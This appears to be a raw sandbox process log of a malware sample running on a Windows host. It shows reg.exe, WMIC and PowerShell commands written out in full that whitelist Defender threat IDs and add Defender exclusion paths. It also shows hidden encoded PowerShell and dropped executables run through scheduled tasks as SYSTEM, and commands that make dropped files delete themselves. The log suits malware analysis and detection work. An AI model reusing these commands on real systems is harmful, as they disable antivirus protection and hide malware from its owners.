C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:323⤵PID:3956
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:643⤵PID:9156
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:323⤵PID:6408
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:643⤵PID:8624
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:323⤵PID:8568
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:643⤵PID:7456
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:323⤵PID:4192
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:643⤵PID:8132
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:323⤵PID:7360
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:643⤵PID:8220
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:323⤵PID:8360
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:643⤵PID:7572
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:323⤵PID:8468
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:643⤵PID:8540
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:323⤵PID:9204
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:643⤵PID:7960
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:323⤵PID:8376
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:643⤵PID:7664
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\NMbcPgNClKinC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\NMbcPgNClKinC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\STjmdXhOU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\STjmdXhOU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\YceypsUXabDXnCzNCPR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\YceypsUXabDXnCzNCPR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ZHcfdgyasGUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ZHcfdgyasGUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\gaSWcYIjjvwU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\gaSWcYIjjvwU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\QPFeEjmgnBUOfRVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\QPFeEjmgnBUOfRVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\nitzTrLPrXGkZCFFk\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\nitzTrLPrXGkZCFFk\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\nyFjvKGtfVGLAKAU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\nyFjvKGtfVGLAKAU\" /t REG_DWORD /d 0 /reg:64;"2⤵PID:5068
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\NMbcPgNClKinC" /t REG_DWORD /d 0 /reg:323⤵PID:5316
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\NMbcPgNClKinC" /t REG_DWORD /d 0 /reg:324⤵PID:8628
-
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\NMbcPgNClKinC" /t REG_DWORD /d 0 /reg:643⤵PID:3744
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\STjmdXhOU" /t REG_DWORD /d 0 /reg:323⤵PID:8488
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\STjmdXhOU" /t REG_DWORD /d 0 /reg:643⤵PID:8556
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\YceypsUXabDXnCzNCPR" /t REG_DWORD /d 0 /reg:323⤵PID:5052
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\YceypsUXabDXnCzNCPR" /t REG_DWORD /d 0 /reg:643⤵PID:7916
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZHcfdgyasGUn" /t REG_DWORD /d 0 /reg:323⤵PID:400
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZHcfdgyasGUn" /t REG_DWORD /d 0 /reg:643⤵PID:7208
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\gaSWcYIjjvwU2" /t REG_DWORD /d 0 /reg:323⤵PID:8224
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\gaSWcYIjjvwU2" /t REG_DWORD /d 0 /reg:643⤵PID:1008
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\QPFeEjmgnBUOfRVB /t REG_DWORD /d 0 /reg:323⤵PID:8464
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\QPFeEjmgnBUOfRVB /t REG_DWORD /d 0 /reg:643⤵PID:7636
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\nitzTrLPrXGkZCFFk /t REG_DWORD /d 0 /reg:323⤵PID:1556
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\nitzTrLPrXGkZCFFk /t REG_DWORD /d 0 /reg:643⤵PID:7980
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\nyFjvKGtfVGLAKAU /t REG_DWORD /d 0 /reg:323⤵PID:7040
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\nyFjvKGtfVGLAKAU /t REG_DWORD /d 0 /reg:643⤵PID:8576
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "goEYuFxnG" /SC once /ST 00:51:44 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="2⤵
- Creates scheduled task(s)
PID:7952
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "goEYuFxnG"2⤵PID:8248
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "goEYuFxnG"2⤵PID:9072
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "xsEpqqHAgqAwsAroz" /SC once /ST 01:54:36 /RU "SYSTEM" /TR "\"C:\Windows\Temp\nyFjvKGtfVGLAKAU\PmsBVDuTBNtRlfz\wAkNRXh.exe\" za /site_id 668658 /S" /V1 /F2⤵
- Creates scheduled task(s)
PID:8928
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "xsEpqqHAgqAwsAroz"2⤵PID:4512
-
-
C:\Users\Admin\AppData\Local\Temp\9176.exeC:\Users\Admin\AppData\Local\Temp\9176.exe1⤵PID:9160
-
C:\Users\Admin\AppData\Local\Temp\F198.exeC:\Users\Admin\AppData\Local\Temp\F198.exe1⤵PID:7620
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
PID:7992 -
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵PID:8588
-
-
C:\Users\Admin\AppData\Local\Temp\3F8A.exeC:\Users\Admin\AppData\Local\Temp\3F8A.exe1⤵PID:6484
-
C:\Users\Admin\AppData\Local\Temp\53A0.exeC:\Users\Admin\AppData\Local\Temp\53A0.exe1⤵PID:8608
-
C:\Windows\SysWOW64\cmd.execmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\53A0.exe"2⤵PID:2292
-
C:\Windows\SysWOW64\timeout.exetimeout /T 10 /NOBREAK3⤵
- Delays execution with timeout.exe
PID:6000
-
-
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
PID:8168 -
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵PID:8920
-
-
C:\Users\Admin\AppData\Local\Temp\ED60.exeC:\Users\Admin\AppData\Local\Temp\ED60.exe1⤵PID:7436
-
C:\Users\Admin\AppData\Local\Temp\518A.exeC:\Users\Admin\AppData\Local\Temp\518A.exe1⤵PID:4648
-
C:\Users\Admin\AppData\Roaming\rfwritjC:\Users\Admin\AppData\Roaming\rfwritj1⤵PID:8220
-
C:\Users\Admin\AppData\Roaming\fgwritjC:\Users\Admin\AppData\Roaming\fgwritj1⤵PID:6228
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==1⤵PID:8984
-
C:\Users\Admin\AppData\Local\Temp\7AC.exeC:\Users\Admin\AppData\Local\Temp\7AC.exe1⤵PID:8672
-
C:\Windows\SysWOW64\cmd.execmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\7AC.exe"2⤵PID:5176
-
C:\Windows\SysWOW64\timeout.exetimeout /T 10 /NOBREAK3⤵
- Delays execution with timeout.exe
PID:68
-
-
-
C:\Users\Admin\AppData\Local\Temp\nitzTrLPrXGkZCFFk\iXkrQovqyvDrylo\LGLXNzn.exeC:\Users\Admin\AppData\Local\Temp\nitzTrLPrXGkZCFFk\iXkrQovqyvDrylo\LGLXNzn.exe W8 /site_id 668658 /S1⤵PID:5420
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True" &2⤵PID:7724
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True"3⤵PID:7980
-
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True4⤵PID:2872
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True5⤵PID:7372
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True6⤵PID:308
-
-
-
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;"2⤵PID:5496
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:323⤵PID:7608
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:324⤵PID:2068
-
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:643⤵PID:4248
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:323⤵PID:9272
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:643⤵PID:9432
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:323⤵PID:9528
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:643⤵PID:9592
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:323⤵PID:9672
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:643⤵PID:9772
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:323⤵PID:9820
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:643⤵PID:9940
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:323⤵PID:10080
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:643⤵PID:10156
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:323⤵PID:10196
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:643⤵PID:10220
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:323⤵PID:7600
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:643⤵PID:9268
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:323⤵PID:9312
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:643⤵PID:9344
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:323⤵PID:9400
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:643⤵PID:9280
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:323⤵PID:8144
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:643⤵PID:9756
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:323⤵PID:9820
-
-
